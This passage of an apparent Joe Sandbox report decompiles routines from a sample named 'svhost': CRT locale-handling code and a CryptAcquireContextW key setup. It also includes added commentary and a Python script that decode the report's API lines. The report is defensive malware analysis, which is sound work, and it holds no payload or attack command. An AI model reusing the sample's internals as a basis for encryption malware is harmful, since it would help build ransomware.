                                      				_push(_t124);
                                      				if( *_t92 == _t114) {
                                      					E00EB88AE(_t85, _t92);
                                      					goto L12;
                                      				} else {
                                      					if( *((intOrPtr*)( *_t117)) == _t114) {
                                      						E00EB89CE();
                                      					} else {
                                      						E00EB8935(_t92);
                                      					}
                                      					if( *((intOrPtr*)(_t124 + 8)) == 0) {
                                      						_t78 = E00EB8F3D(0xecbf50, 0x40, _t124);
                                      						_t132 = _t132 + 0xc;
                                      						if(_t78 != 0) {
                                      							_push(_t124);
                                      							if( *((intOrPtr*)( *_t117)) == 0) {
                                      								E00EB89CE();
                                      							} else {
                                      								E00EB8935(0);
                                      							}
                                      							L12:
                                      						}
                                      					}
                                      				}
                                      				if( *((intOrPtr*)(_t124 + 8)) == 0) {
                                      					L37:
                                      					_t37 = 0;
                                      					goto L38;
                                      				} else {
                                      					_t38 = _t85 + 0x100;
                                      					if( *_t85 != 0 ||  *_t38 != 0) {
                                      						_t39 = E00EB8DFA(_t38, _t124);
                                      					} else {
                                      						_t39 = GetACP();
                                      					}
                                      					_t126 = _t39;
                                      					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
                                      						goto L37;
                                      					} else {
                                      						_t42 = _a8;
                                      						if(_t42 != 0) {
                                      							 *_t42 = _t126;
                                      						}
                                      						_t120 = _a12;
                                      						if(_t120 == 0) {
                                      							L36:
                                      							_t37 = 1;
                                      							L38:
                                      							return _t37;
                                      						} else {
                                      							_t96 = _v8;
                                      							_t15 = _t120 + 0x120; // 0xd0
                                      							_t87 = _t15;
                                      							 *_t87 = 0;
                                      							_t16 = _t96 + 2; // 0x6
                                      							_t115 = _t16;
                                      							do {
                                      								_t45 =  *_t96;
                                      								_t96 = _t96 + 2;
                                      							} while (_t45 != _v12);
                                      							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
                                      							_t47 = E00EAFAFC(_t87, 0x55, _v8);
                                      							_t133 = _t132 + 0x10;
                                      							if(_t47 != 0) {
                                      								L39:
                                      								_push(0);
                                      								_push(0);
                                      								_push(0);
                                      								_push(0);
                                      								_push(0);
                                      								E00EA4980();
                                      								asm("int3");
                                      								_t131 = _t133;
                                      								_t50 =  *0xeef074; // 0x221cac15
                                      								_v52 = _t50 ^ _t133;
                                      								_push(_t87);
                                      								_push(_t126);
                                      								_push(_t120);
                                      								_t52 = E00EB0EFC(_t98, _t115);
                                      								_t88 = _t52;
                                      								_t121 =  *(E00EB0EFC(_t98, _t115) + 0x34c);
                                      								_t128 = E00EB96E5(_v40);
                                      								asm("sbb ecx, ecx");
                                      								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                                      								if(_t56 != 0) {
                                      									if(E00EB6062(_t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E00EB9817(_t128) != 0) {
                                      										 *_t121 =  *_t121 | 0x00000004;
                                      										_t121[2] = _t128;
                                      										_t121[1] = _t128;
                                      									}
                                      								} else {
                                      									 *_t121 =  *_t121 & _t56;
                                      								}
                                      								_pop(_t122);
                                      								_pop(_t129);
                                      								_pop(_t89);
                                      								return E00E89A35(_t89, _v12 ^ _t131, _t115, _t122, _t129);
                                      							} else {
                                      								if(E00EB16D5(_t87, 0x1001, _t120, 0x40) == 0) {
                                      									goto L37;
                                      								} else {
                                      									_t20 = _t120 + 0x80; // 0x30
                                      									_t87 = _t20;
                                      									_t21 = _t120 + 0x120; // 0xd0
                                      									if(E00EB16D5(_t21, 0x1002, _t87, 0x40) == 0) {
                                      										goto L37;
                                      									} else {
                                      										_push(0x5f);
                                      										_t69 = E00EBF87B(_t98);
                                      										_t98 = _t87;
                                      										if(_t69 != 0) {
                                      											L31:
                                      											_t22 = _t120 + 0x120; // 0xd0
                                      											if(E00EB16D5(_t22, 7, _t87, 0x40) == 0) {
                                      												goto L37;
                                      											} else {
                                      												goto L32;
                                      											}
                                      										} else {
                                      											_push(0x2e);
                                      											_t74 = E00EBF87B(_t98);
                                      											_t98 = _t87;
                                      											if(_t74 == 0) {
                                      												L32:
                                      												_t120 = _t120 + 0x100;
                                      												if(_t126 != 0xfde9) {
                                      													E00EBDEDC(_t98, _t126, _t120, 0x10, 0xa);
                                      													goto L36;
                                      												} else {
                                      													_push(5);
                                      													_t73 = E00EAFAFC(_t120, 0x10, L"utf8");
                                      													_t133 = _t133 + 0x10;
                                      													if(_t73 != 0) {
                                      														goto L39;
                                      													} else {
                                      														goto L36;
                                      													}
                                      												}
                                      											} else {
                                      												goto L31;
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      			}

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • GetACP.KERNEL32(?,?,?,?,?,?,00EAE672,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EB906B
                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00EAE672,?,?,?,00000055,?,-00000050,?,?), ref: 00EB9096
                                      • _wcschr.LIBVCRUNTIME ref: 00EB912A
                                      • _wcschr.LIBVCRUNTIME ref: 00EB9138
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EB91F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                      • String ID: utf8
                                      • API String ID: 4147378913-905460609
                                      • Opcode ID: f8c087b2464fe8e1761eebb9ffdb690074a8f371b9f00adaa3e533af612dc69e
                                      • Instruction ID: a1f0e1b7b9db1a8b7e313619303eb3fcf029da94eb73efdfbb93ba800912ca10
                                      • Opcode Fuzzy Hash: f8c087b2464fe8e1761eebb9ffdb690074a8f371b9f00adaa3e533af612dc69e
                                      • Instruction Fuzzy Hash: 60711671A00202AADB24AB39CC46BFB73E8EF45714F156079F649FB182EB74E941D750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E00EB9736(void* __ecx, signed int _a4, intOrPtr _a8) {
                                      				short _v8;
                                      				short _t17;
                                      				signed int _t18;
                                      				signed int _t23;
                                      				signed int _t25;
                                      				signed int _t26;
                                      				signed int _t27;
                                      				void* _t30;
                                      				void* _t31;
                                      				intOrPtr _t32;
                                      				intOrPtr _t33;
                                      				intOrPtr* _t36;
                                      				intOrPtr* _t37;
                                      
                                      				_push(__ecx);
                                      				_t23 = _a4;
                                      				if(_t23 == 0) {
                                      					L21:
                                      					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
                                      						_t17 = _v8;
                                      						if(_t17 == 0) {
                                      							_t17 = GetACP();
                                      						}
                                      						L25:
                                      						return _t17;
                                      					}
                                      					L22:
                                      					_t17 = 0;
                                      					goto L25;
                                      				}
                                      				_t18 = 0;
                                      				if( *_t23 == 0) {
                                      					goto L21;
                                      				}
                                      				_t36 = L"ACP";
                                      				_t25 = _t23;
                                      				while(1) {
                                      					_t30 =  *_t25;
                                      					if(_t30 !=  *_t36) {
                                      						break;
                                      					}
                                      					if(_t30 == 0) {
                                      						L7:
                                      						_t26 = _t18;
                                      						L9:
                                      						if(_t26 == 0) {
                                      							goto L21;
                                      						}
                                      						_t37 = L"OCP";
                                      						_t27 = _t23;
                                      						while(1) {
                                      							_t31 =  *_t27;
                                      							if(_t31 !=  *_t37) {
                                      								break;
                                      							}
                                      							if(_t31 == 0) {
                                      								L17:
                                      								if(_t18 != 0) {
                                      									_t17 = E00EB03BF(_t23, _t23);
                                      									goto L25;
                                      								}
                                      								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
                                      									goto L22;
                                      								}
                                      								_t17 = _v8;
                                      								goto L25;
                                      							}
                                      							_t32 =  *((intOrPtr*)(_t27 + 2));
                                      							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                                      								break;
                                      							}
                                      							_t27 = _t27 + 4;
                                      							_t37 = _t37 + 4;
                                      							if(_t32 != 0) {
                                      								continue;
                                      							}
                                      							goto L17;
                                      						}
                                      						asm("sbb eax, eax");
                                      						_t18 = _t18 | 0x00000001;
                                      						goto L17;
                                      					}
                                      					_t33 =  *((intOrPtr*)(_t25 + 2));
                                      					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                                      						break;
                                      					}
                                      					_t25 = _t25 + 4;
                                      					_t36 = _t36 + 4;
                                      					if(_t33 != 0) {
                                      						continue;
                                      					}
                                      					goto L7;
                                      				}
                                      				asm("sbb edx, edx");
                                      				_t26 = _t25 | 0x00000001;
                                      				goto L9;
                                      			}


Execution address map for E00EB9736 (one address per decompiled line, 0x00000000 where a line has no code): 0x00eb973b through 0x00eb9816.

                                      APIs
                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00EB9A54,00000002,00000000,?,?,?,00EB9A54,?,00000000), ref: 00EB97CF
                                      • GetLocaleInfoW.KERNEL32(?,20001004,00EB9A54,00000002,00000000,?,?,?,00EB9A54,?,00000000), ref: 00EB97F8
                                      • GetACP.KERNEL32(?,?,00EB9A54,?,00000000), ref: 00EB980D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: f8f656bf6f8e29845e4dec62ac8a85a86c1fa4b3bb7dc142d95cfe99886f99da
                                      • Instruction ID: ddf6c56d89da98edb4886c4758a1b22fdf7c2ad490e71714dee885afe793aa6e
                                      • Opcode Fuzzy Hash: f8f656bf6f8e29845e4dec62ac8a85a86c1fa4b3bb7dc142d95cfe99886f99da
                                      • Instruction Fuzzy Hash: 0321F132A10110AADB348F65C901FD772E6AF54B58B1A9036EB0AF7212EB32DE41C350
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E00E65CB0(intOrPtr __ecx) {
                                      				char _v5;
                                      				intOrPtr _v12;
                                      				intOrPtr _t9;
                                      				long _t11;
                                      
                                      				_v12 = __ecx;
                                      				_t9 = _v12;
                                      				if( *((intOrPtr*)(_t9 + 0xc)) == 0) {
                                      					__imp__CryptAcquireContextW(_v12 + 0xc, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
                                      					if(_t9 != 0) {
                                      						return 1;
                                      					}
                                      					_t11 = GetLastError();
                                      					if(_t11 != 0x80090016) {
                                      						return 0;
                                      					}
                                      					__imp__CryptAcquireContextW(_v12 + 0xc, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                      					if(_t11 == 0) {
                                      						_v5 = 0;
                                      					} else {
                                      						_v5 = 1;
                                      					}
                                      					return _v5;
                                      				}
                                      				return 1;
                                      			}


Execution address map for E00E65CB0 (one address per decompiled line, 0x00000000 where a line has no code): 0x00e65cb6 through 0x00e65d21.

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(00E55DD0,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65CDB
                                      • GetLastError.KERNEL32(?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65CE5
                                      • CryptAcquireContextW.ADVAPI32(-0000000B,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D04
                                      Strings
                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00E65CCD
                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00E65CF6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AcquireContextCrypt$ErrorLast
                                      • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 2779411412-947817771
                                      • Opcode ID: d65fbc96e077675ba8befdea90929f9bfb5f788231a1d094bcae6230726695e3
                                      • Instruction ID: 380e5d5e044bbfc2b2fdf434d004993301571b4c216499e779b3b2aed04589e3
                                      • Opcode Fuzzy Hash: d65fbc96e077675ba8befdea90929f9bfb5f788231a1d094bcae6230726695e3
                                      • Instruction Fuzzy Hash: 6301F931BC874CBBDB109B95AC4DFEF7B749B01749F156498E6007B2C1C2B684499B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%
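The records above carry two things worth decoding rather than reading as raw hex: the CRT locale code in E00EB9736 (and its caller E00EB990B), which resolves ".ACP"/".OCP" through GetLocaleInfoW with LOCALE_RETURN_NUMBER, and the sample's own key-provider setup in E00E65CB0, which acquires "Microsoft Enhanced Cryptographic Provider v1.0" with CRYPT_VERIFYCONTEXT and, when GetLastError returns 0x80090016 (NTE_BAD_KEYSET), retries with CRYPT_NEWKEYSET. The script below is an added example written for this page; it is not Joe Sandbox code and not code from the sample. It parses API reference lines in the report's own format (the six sample lines are copied from the API lists of E00EB9736 and E00E65CB0 and embedded as constructed input), names the PROV_*, CRYPT_* and LOCALE_* constants from wincrypt.h and winnls.h, and flags the acquire-then-create pattern. The ARITY table and the explain_csp_fallback heuristic are my own assumptions, not report fields.

```python
"""Decode Joe Sandbox 'APIs' reference lines into named Win32 parameters.

Added example for this report page; not part of Joe Sandbox or of the sample.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

# Constructed input: six lines copied verbatim from the API lists of E00EB9736 and E00E65CB0.
SAMPLE_API_LINES = """\
• GetLocaleInfoW.KERNEL32(?,2000000B,00EB9A54,00000002,00000000,?,?,?,00EB9A54,?,00000000), ref: 00EB97CF
• GetLocaleInfoW.KERNEL32(?,20001004,00EB9A54,00000002,00000000,?,?,?,00EB9A54,?,00000000), ref: 00EB97F8
• GetACP.KERNEL32(?,?,00EB9A54,?,00000000), ref: 00EB980D
• CryptAcquireContextW.ADVAPI32(00E55DD0,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65CDB
• GetLastError.KERNEL32(?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65CE5
• CryptAcquireContextW.ADVAPI32(-0000000B,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D04
"""

LINE_RE = re.compile(r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{1,8}$")

# Assumed parameter counts: the sandbox dumps extra stack slots past the real arguments.
ARITY = {"CryptAcquireContextW": 5, "GetLocaleInfoW": 4, "GetACP": 0, "GetLastError": 0}

# wincrypt.h
PROV_TYPES = {1: "PROV_RSA_FULL", 24: "PROV_RSA_AES"}
CRYPT_FLAGS = {0xF0000000: "CRYPT_VERIFYCONTEXT", 0x8: "CRYPT_NEWKEYSET", 0x10: "CRYPT_DELETEKEYSET",
               0x20: "CRYPT_MACHINE_KEYSET", 0x40: "CRYPT_SILENT"}
NTE_BAD_KEYSET = 0x80090016  # the GetLastError value E00E65CB0 tests before its second acquire
# winnls.h
LOCALE_FLAGS = {0x20000000: "LOCALE_RETURN_NUMBER", 0x80000000: "LOCALE_NOUSEROVERRIDE"}
LCTYPES = {0x0B: "LOCALE_IDEFAULTCODEPAGE", 0x1004: "LOCALE_IDEFAULTANSICODEPAGE",
           0x1001: "LOCALE_SENGLANGUAGE", 0x1002: "LOCALE_SENGCOUNTRY"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Union[int, str, None]]
    ref: int
    notes: Dict[str, str] = field(default_factory=dict)


def parse_value(tok: str) -> Union[int, str, None]:
    tok = tok.strip()
    if tok == "?":
        return None  # slot the sandbox could not resolve
    if HEX_RE.match(tok):  # '-0000000B' is how the report renders a negative 32-bit value
        val = int(tok.lstrip("-"), 16)
        return (-val) & 0xFFFFFFFF if tok.startswith("-") else val
    return tok  # a resolved string (provider name, GUID)


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    return [name for mask, name in table.items() if value & mask == mask]


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = [parse_value(t) for t in m["args"].split(",")]
    n = ARITY.get(m["api"])
    args = raw[:n] if n is not None else raw
    call = ApiCall(m["api"], m["mod"], args, int(m["ref"], 16))
    if call.api == "CryptAcquireContextW" and len(args) == 5 \
            and isinstance(args[3], int) and isinstance(args[4], int):
        call.notes["container"] = "NULL (default)" if args[1] == 0 else str(args[1])
        call.notes["provider"] = str(args[2])
        call.notes["prov_type"] = PROV_TYPES.get(args[3], hex(args[3]))
        call.notes["flags"] = "|".join(decode_flags(args[4], CRYPT_FLAGS)) or "0"
    elif call.api == "GetLocaleInfoW" and len(args) == 4 and isinstance(args[1], int):
        high = decode_flags(args[1] & 0xFFFF0000, LOCALE_FLAGS)
        low = LCTYPES.get(args[1] & 0xFFFF, hex(args[1] & 0xFFFF))
        call.notes["lctype"] = "|".join(high + [low])
        call.notes["cch"] = str(args[3])
    return call


def parse_report(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


def explain_csp_fallback(calls: List[ApiCall]) -> Optional[str]:
    """Heuristic (my assumption): an ephemeral CRYPT_VERIFYCONTEXT acquire followed by a
    CRYPT_NEWKEYSET acquire of the same provider is the acquire-then-create idiom."""
    acq = [c for c in calls if c.api == "CryptAcquireContextW"]
    if len(acq) < 2 or acq[0].notes.get("provider") != acq[1].notes.get("provider"):
        return None
    if "CRYPT_VERIFYCONTEXT" in acq[0].notes.get("flags", "") and \
            "CRYPT_NEWKEYSET" in acq[1].notes.get("flags", ""):
        return (f"{acq[0].notes['provider']} ({acq[0].notes['prov_type']}): ephemeral context at "
                f"{acq[0].ref:08X}, new key container at {acq[1].ref:08X} if the first call "
                f"fails with NTE_BAD_KEYSET (0x{NTE_BAD_KEYSET:08X})")
    return None


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_API_LINES)
    for c in parsed:
        print(f"{c.ref:08X} {c.api} {c.notes}")
    print(explain_csp_fallback(parsed))
```

Only the first ARITY[api] slots are real parameters; the trailing values (the repeated GUID after every E00E65CB0 call, the 00EB9A54 after GetACP) are further stack slots the sandbox dumps, not arguments. The two GetLocaleInfoW LCTypes, 0x2000000B and 0x20001004, are the CRT's setlocale handling of ".OCP" and ".ACP" and say nothing about the sample; the CryptAcquireContextW pair is the sample's own key setup, and the verify-only context it asks for first is what a file encryptor needs, since it never has to persist a key container.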

                                      C-Code - Quality: 92%
                                      			E00EB990B(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
                                      				signed int _v8;
                                      				int _v12;
                                      				int _v16;
                                      				char _v20;
                                      				signed short* _v24;
                                      				short* _v28;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t39;
                                      				void* _t45;
                                      				signed short* _t46;
                                      				signed short _t47;
                                      				short* _t48;
                                      				int _t49;
                                      				short* _t55;
                                      				short* _t56;
                                      				short* _t57;
                                      				int _t65;
                                      				int _t67;
                                      				short* _t71;
                                      				intOrPtr _t74;
                                      				void* _t76;
                                      				short* _t77;
                                      				intOrPtr _t84;
                                      				short* _t87;
                                      				short* _t90;
                                      				short** _t100;
                                      				short* _t101;
                                      				signed short _t102;
                                      				signed int _t105;
                                      				void* _t106;
                                      
                                      				_t39 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t39 ^ _t105;
                                      				_t87 = _a12;
                                      				_t102 = _a4;
                                      				_v28 = _a8;
                                      				_v24 = E00EB0EFC(__ecx, __edx) + 0x50;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_t45 = E00EB0EFC(__ecx, __edx);
                                      				_t98 = 0;
                                      				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                                      				_t90 = _t102 + 0x80;
                                      				_t46 = _v24;
                                      				 *_t46 = _t102;
                                      				_t100 =  &(_t46[2]);
                                      				 *_t100 = _t90;
                                      				if(_t90 != 0 &&  *_t90 != 0) {
                                      					_t84 =  *0xecc374; // 0x17
                                      					E00EB98AA(_t90, 0, 0xecc260, _t84 - 1, _t100);
                                      					_t46 = _v24;
                                      					_t106 = _t106 + 0xc;
                                      					_t98 = 0;
                                      				}
                                      				_v20 = _t98;
                                      				_t47 =  *_t46;
                                      				if(_t47 == 0 ||  *_t47 == _t98) {
                                      					_t48 =  *_t100;
                                      					__eflags = _t48;
                                      					if(_t48 == 0) {
                                      						L19:
                                      						_v20 = 0x104;
                                      						_t49 = GetUserDefaultLCID();
                                      						_v12 = _t49;
                                      						_v16 = _t49;
                                      						goto L20;
                                      					}
                                      					__eflags =  *_t48 - _t98;
                                      					if(__eflags == 0) {
                                      						goto L19;
                                      					}
                                      					E00EB924C(_t90, _t98, __eflags,  &_v20);
                                      					_pop(_t90);
                                      					goto L20;
                                      				} else {
                                      					_t71 =  *_t100;
                                      					if(_t71 == 0) {
                                      						L8:
                                      						E00EB9332(_t90, _t98, __eflags,  &_v20);
                                      						L9:
                                      						_pop(_t90);
                                      						if(_v20 != 0) {
                                      							_t101 = 0;
                                      							__eflags = 0;
                                      							L25:
                                      							asm("sbb esi, esi");
                                      							_t102 = E00EB9736(_t90,  ~_t102 & _t102 + 0x00000100,  &_v20);
                                      							__eflags = _t102;
                                      							if(_t102 == 0) {
                                      								L22:
                                      								L23:
                                      								return E00E89A35(_t87, _v8 ^ _t105, _t98, _t101, _t102);
                                      							}
                                      							_t55 = IsValidCodePage(_t102 & 0x0000ffff);
                                      							__eflags = _t55;
                                      							if(_t55 == 0) {
                                      								goto L22;
                                      							}
                                      							_t56 = IsValidLocale(_v16, 1);
                                      							__eflags = _t56;
                                      							if(_t56 == 0) {
                                      								goto L22;
                                      							}
                                      							_t57 = _v28;
                                      							__eflags = _t57;
                                      							if(_t57 != 0) {
                                      								 *_t57 = _t102;
                                      							}
                                      							E00EB1857(_v16,  &(_v24[0x128]), 0x55, _t101);
                                      							__eflags = _t87;
                                      							if(_t87 == 0) {
                                      								L34:
                                      								goto L23;
                                      							}
                                      							_t33 =  &(_t87[0x90]); // 0xd0
                                      							E00EB1857(_v16, _t33, 0x55, _t101);
                                      							_t65 = GetLocaleInfoW(_v16, 0x1001, _t87, 0x40);
                                      							__eflags = _t65;
                                      							if(_t65 == 0) {
                                      								goto L22;
                                      							}
                                      							_t36 =  &(_t87[0x40]); // 0x30
                                      							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                                      							__eflags = _t67;
                                      							if(_t67 == 0) {
                                      								goto L22;
                                      							}
                                      							_t38 =  &(_t87[0x80]); // 0xb0
                                      							E00EBDEDC(_t38, _t102, _t38, 0x10, 0xa);
                                      							goto L34;
                                      						}
                                      						_t74 =  *0xecc25c; // 0x41
                                      						_t76 = E00EB98AA(_t90, _t98, 0xecbf50, _t74 - 1, _v24);
                                      						_t106 = _t106 + 0xc;
                                      						if(_t76 == 0) {
                                      							L20:
                                      							_t101 = 0;
                                      							__eflags = 0;
                                      							L21:
                                      							if(_v20 != 0) {
                                      								goto L25;
                                      							}
                                      							goto L22;
                                      						}
                                      						_t77 =  *_t100;
                                      						_t101 = 0;
                                      						if(_t77 == 0) {
                                      							L14:
                                      							E00EB9332(_t90, _t98, __eflags,  &_v20);
                                      							L15:
                                      							_pop(_t90);
                                      							goto L21;
                                      						}
                                      						_t119 =  *_t77;
                                      						if( *_t77 == 0) {
                                      							goto L14;
                                      						}
                                      						E00EB9297(_t90, _t98, _t119,  &_v20);
                                      						goto L15;
                                      					}
                                      					_t115 =  *_t71 - _t98;
                                      					if( *_t71 == _t98) {
                                      						goto L8;
                                      					}
                                      					E00EB9297(_t90, _t98, _t115,  &_v20);
                                      					goto L9;
                                      				}
                                      			}
                                      • Statement addresses: side column of the C-code listing above (one address per line), spanning 0x00eb9913 to 0x00eb9afa; the per-line alignment was not preserved in this extraction.

                                      APIs (this routine is CRT setlocale support code: the GetLocaleInfoW calls below request LCType 0x1001 = LOCALE_SENGLANGUAGE and 0x1002 = LOCALE_SENGCOUNTRY, so these locale queries are library code rather than sample-specific logic)
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                        • Part of subcall function 00EB0EFC: _free.LIBCMT ref: 00EB0F5E
                                        • Part of subcall function 00EB0EFC: _free.LIBCMT ref: 00EB0F94
                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EB9A17
                                      • IsValidCodePage.KERNEL32(00000000), ref: 00EB9A60
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00EB9A6F
                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EB9AB7
                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EB9AD6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                      • String ID:
                                      • API String ID: 949163717-0
                                      • Opcode ID: 925af7ff6c3dfea20d90850ab49190413cb6cb23b772587267281de4b94fe4f6
                                      • Instruction ID: e78d39de3a0cbf4eda10b5cb3a3d66ff2f78a117a55b74e38f9c880a8398b9a3
